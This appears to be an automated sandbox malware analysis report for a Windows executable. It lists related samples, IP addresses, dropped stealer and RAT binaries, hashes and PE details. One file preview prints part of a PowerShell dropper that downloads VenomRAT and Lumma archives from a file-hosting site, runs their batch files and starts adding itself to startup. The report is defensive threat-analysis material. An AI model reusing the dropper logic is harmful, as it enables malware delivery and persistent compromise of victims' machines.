	invoker.ps1	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	locker.ps1	Get hash	malicious	TrojanRansom	Browse	104.26.3.16 31.14.70.245
	CCdaw0qbbo.exe	Get hash	malicious	RedLine	Browse	104.26.3.16 31.14.70.245
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
a0e9f5d64349fb13191bc781f81f42e1	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	github_softwares_v1.18.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	pn24_065.docx.doc	Get hash	malicious	Unknown	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	185.149.100.242 162.0.235.84 188.114.96.3
	DS_Store.exe	Get hash	malicious	CobaltStrike, ReflectiveLoader	Browse	185.149.100.242 162.0.235.84 188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\6E8A.exe	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
C:\Users\user\AppData\Local\Temp\3530.exe	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
C:\Users\user\AppData\Local\Temp\3530.exe	file.exe	Get hash	malicious	SmokeLoader	Browse
C:\Users\user\AppData\Local\Temp\7C81.exe	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
C:\Users\user\AppData\Local\Temp\7C81.exe	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6E8A.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\6E8A.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1515
Entropy (8bit):	5.3602768626210215
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNXE4ZR:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	366F3274873188864F1C9DC2A155FE99
SHA1:	DC6D430ADC2BF68980D60D32832F937A19002970
SHA-256:	942877BF38C3575135E9008E3C2880D64ED5D43E32F125E05DD4D969357EB92F
SHA-512:	1146FD3F3661BF222A48E0C51909C64A57B322556D8C43DDCEB2CF7A3F07F99B7AECC843211B3598643EF447D651873BA13AD335FB74004CE3B51F8F98C22156
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1022
Entropy (8bit):	5.252542495586483
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
MD5:	2F99BED9FF8C41AFEE96B028ED8B86A2
SHA1:	BF4E91361EE28C5506E812F2BF8C3495676097B0
SHA-256:	F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
SHA-512:	834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\3530.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	988672
Entropy (8bit):	7.331838963074561
Encrypted:	false
SSDEEP:	24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
MD5:	2B3ECC21382E825D6FE0812A717717EB
SHA1:	F3386531F7726A4F673003BF6CB5806843B76FFB
SHA-256:	AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
SHA-512:	7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: 7Y18r(14).exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6E8A.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	141944
Entropy (8bit):	5.653169478479977
Encrypted:	false
SSDEEP:	1536:0OrbHDFbGsQ/Q/WGX5Nqzaiz1agCDP2zJ43MOkCYZZ2vWFx6qKZ:9rLDFbGYHiYbP2qkf2Kx6N
MD5:	B6A1C0998D0A7979C9EC17B8D5CF8A81
SHA1:	32154E9BDCD0975A4095A88B68834E2DA21412DD
SHA-256:	4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
SHA-512:	80EA862F84FC9FBF67607D31177161D908F12FA720C0984AD20BDB9E33C215E781BE3C20B7AB327476966F4E224A993E557975536A229EC8B1F5DD531613A980
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 7Y18r(14).exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.........."...0..4............... .....@..... .......................@............`...@......@............... ...............................`..................x&........................................................................... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H...........h...........(G...............................................0..).............(.....o.......-..................J.(.....(....}.....0..I........{......~....~....o....,.r...ps....z.{......~....~....o....,.r=..ps....z..{....o....,.rs..ps....z..}.......0..C........{.......o....,%r...p.....(..........(....(....s....z..s.....(.....s....t......0..T....... ..75 ?h.. .... .... ..... .....O .... .... ....s.........(....(...+o....s.........V.(......}......}....*...0..........

C:\Users\user\AppData\Local\Temp\7C81.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	11672576
Entropy (8bit):	6.48028581980635
Encrypted:	false
SSDEEP:	98304:LzqI+neqpiuNs3zHlse+SRWSlwEO5zwnJY:N5uNs3zF5+SNJOk
MD5:	D3785ED170CDB1F4784D3DFF3A61DAE0
SHA1:	4BB2D65976DB66FC918C354AA4B2D1162B2420BA
SHA-256:	505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
SHA-512:	3D5C970C602F31E873E655EAB73DAEE3823717E10CF0D660FF59F333F735E3F0C6B13ED15875C10BB39876CC24E48CC73937382F40C9A364BD0DB7745BFF29DD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\7C81.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: 7Y18r(14).exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.,I....................@.....................................4....`... ......................................P..N....`..X.......W...................`.............................. ...(....................d..X............................text....+I......,I.................`.``.data........@I......0I.............@.`..rdata..P.X...T...X...S.............@.`@.pdata............................@.0@.xdata..P...........................@.0@.bss.....~...........................`..edata..N....P......................@.0@.idata..X....`......................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...W...........................@.0..reloc.......`.......t..............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iphtavot.cdr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jeqrphl1.chf.psm1

Download File

Process:	C:\Users\user\AppData\Local\Temp\6E8A.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v21r2jvc.u1m.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\6E8A.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmwgc4wp.1qc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\lumma.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	483840
Entropy (8bit):	7.999476951747165
Encrypted:	true
SSDEEP:	12288:xyY9C/+kpVD3KhE7vLg5C9pyKy8/i4wDW9Ns8PDjxQ1x8MjR/:xhs/+oksg5CTyYa4wa9JJbC
MD5:	BDA258707A259C726AE7B1394B83A105
SHA1:	BE8D5E92C63209740A40E9338C8EEC5D4A0A2C34
SHA-256:	A510F446C9517E37E9AF9DCA2769B52C7D9029EE5659D552AE939974382D4866
SHA-512:	2D56631291B26A080BF89CB63EB11FAD4216E5A5F10055477E9AAEAA316BF62BD8B2E18D1DE85532F1EDDA65CE391E5128B351463EB1F5FE4E9C6AC5A76CF2BD
Malicious:	false
Preview:	PK.........{.X.8..(...)......data.bin..,..`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e.....6.iE[..G.064...^P..j^..H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...\|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.\|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)\|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^....

C:\Users\user\AppData\Local\Temp\rentry-script.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\6E8A.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	2511
Entropy (8bit):	5.252889385795675
Encrypted:	false
SSDEEP:	48:mMB+fxMBQDwX7jCe9HSVdat4ZLd/FK16hiHKiK/OQ/v6/Q6RER/h0JweXuH:mM0fxMi4CQo1tg1lthpS
MD5:	882093038301A8EB3C3310CE46E1075E
SHA1:	157D0D5855C2A66DFE02E06C43B4C56C640B64E6
SHA-256:	ED089944CAF15DB2638AA0BBB7B6FC7BECD4F4D5C08C12F4922AA7BC811046A9
SHA-512:	0F2FB0F4DC18C2C0CB46897D70359D3734F7F737456860083AE9932820FD2AB58DB550F491F594D0531D9465D43BD4FAA6D5B9967716563C7A9E09AEB67DCFC9
Malicious:	true
Preview:	$url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"..$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"..$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVenom")..$tempDir2 = [System.IO.Path]::Combine($env:TEMP, "ExtractedLumma")..$zipPath1 = [System.IO.Path]::Combine($env:TEMP, "venom.zip")..$zipPath2 = [System.IO.Path]::Combine($env:TEMP, "lumma.zip")....function Download-File {.. param (.. [string]$url,.. [string]$outputPath.. ).. Invoke-WebRequest -Uri $url -OutFile $outputPath..}....function Run-BatFiles {.. param (.. [string]$directory.. ).. $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File.. foreach ($batFile in $batFiles) {.. Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow.. }..}....function Add-VbsToStartup {.. param (.. [string]$batFilePath

C:\Users\user\AppData\Local\Temp\venom.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	296998
Entropy (8bit):	7.998052107159895
Encrypted:	true
SSDEEP:	6144:/3eshJ2mAOSiLZh4CPIKBZW7ZN7o8PDj6QN9Q1xipM8QHxwM4Dngzi:feshYbDi1OwDW9Ns8PDjxQ1x8MjR6Dnz
MD5:	8090D3FF2BF334B750478761C31BF25E
SHA1:	EC048B210369DD140BE8ED66D07AC4466AB5F7E4
SHA-256:	63B0E303A05AD2EB2A93E2F9CD96E50361CF1E0D29F9CAB8B0A98D1185347F8A
SHA-512:	DFBBB3468C2012BDF920B8C09DFDB655F3E1369EA9465228E505F1D1DE3AEF9EC9757D7B501C4091C3FF7859F57D2CA646430B4E5CF0E5292AB602B0FB28F654
Malicious:	false
Preview:	PK.........t.X.............data.bin..,..`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j\|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5\|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...\|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P

C:\Users\user\AppData\Roaming\sashibt

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	233472
Entropy (8bit):	5.8414932014553935
Encrypted:	false
SSDEEP:	3072:fCVuay93ubZTcCMPK/cvWIs54Xg3WKSRCyRsEhN4qQzPMVL:6cay93GZIK/g9vRCyaGCVz
MD5:	94267A284D656590E74246749DA7F91C
SHA1:	BCCB3BD1483E50641862412E152DC5C7B590F4E8
SHA-256:	E9DDD60081C3E01D049DC4D5ED5F150AFC27FFBBDB8B6ADF558FA677AD8875DD
SHA-512:	6B951B4D78B0116FA6C0E529BD952C078E07868D74DC260449EA139EFFD3C180167F2DFC6FE2467718AF3A88DC706EC7123E58B3C9BC310DBD7E1A9C77DF606B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Tg.s... ... ... .pQ ... .pd ... .pP t.. .~i ... ... d.. .pU ... .p` ... .pg ... Rich... ........PE..L...._zd.....................x....... ............@.......................... ..................................................x...................................\...................................@............................................text............................... ..`.rdata...2.......4..................@..@.data........0......................@....zowiz.......`......................@..@.jovusaj.....p......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\sashibt:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.8414932014553935
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	233'472 bytes
MD5:	94267a284d656590e74246749da7f91c
SHA1:	bccb3bd1483e50641862412e152dc5c7b590f4e8
SHA256:	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd
SHA512:	6b951b4d78b0116fa6c0e529bd952c078e07868d74dc260449ea139effd3c180167f2dfc6fe2467718af3a88dc706ec7123e58b3c9bc310dbd7e1a9c77df606b
SSDEEP:	3072:fCVuay93ubZTcCMPK/cvWIs54Xg3WKSRCyRsEhN4qQzPMVL:6cay93GZIK/g9vRCyaGCVz
TLSH:	B134CF2976E0DB31E5A7153058B4D6F5163FB8F28B74948F37983BAB2E713C15A60322
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Tg.s... ... ... .pQ ... .pd ... .pP t.. .~i ... ... d.. .pU ... .p` ... .pg ... Rich... ........PE..L...._zd...................

File Icon


Icon Hash:	cd4d3d2e4e054d07

Static PE Info

General

Entrypoint:	0x4020e9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x647A5FB1 [Fri Jun 2 21:31:29 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	227c2d4ce0274b95ccaadb855c19748d

Entrypoint Preview

Instruction
call 00007FCA11207715h
jmp 00007FCA11203D3Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007FCA112054C1h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007FCA11203EC9h
call 00007FCA11204EAFh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007FCA11203FE4h
test al, 40h
je 00007FCA11203EBFh
call 00007FCA11204E94h
mov dword ptr [eax], 00000022h
jmp 00007FCA11203E95h
push ebx
xor ebx, ebx
test al, 01h
je 00007FCA11203EC8h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007FCA11203F3Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007FCA11203EDEh
call 00007FCA11205059h
add eax, 20h
cmp esi, eax
je 00007FCA11203EBEh
call 00007FCA1120504Dh
add eax, 40h
cmp esi, eax
jne 00007FCA11203EBFh
push dword ptr [ebp+0Ch]
call 00007FCA1120809Bh
pop ecx
test eax, eax
jne 00007FCA11203EB9h
push esi
call 00007FCA11208047h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007FCA11203F36h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x218e4	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2048000	0x9a08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2195c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x213b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x1bc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
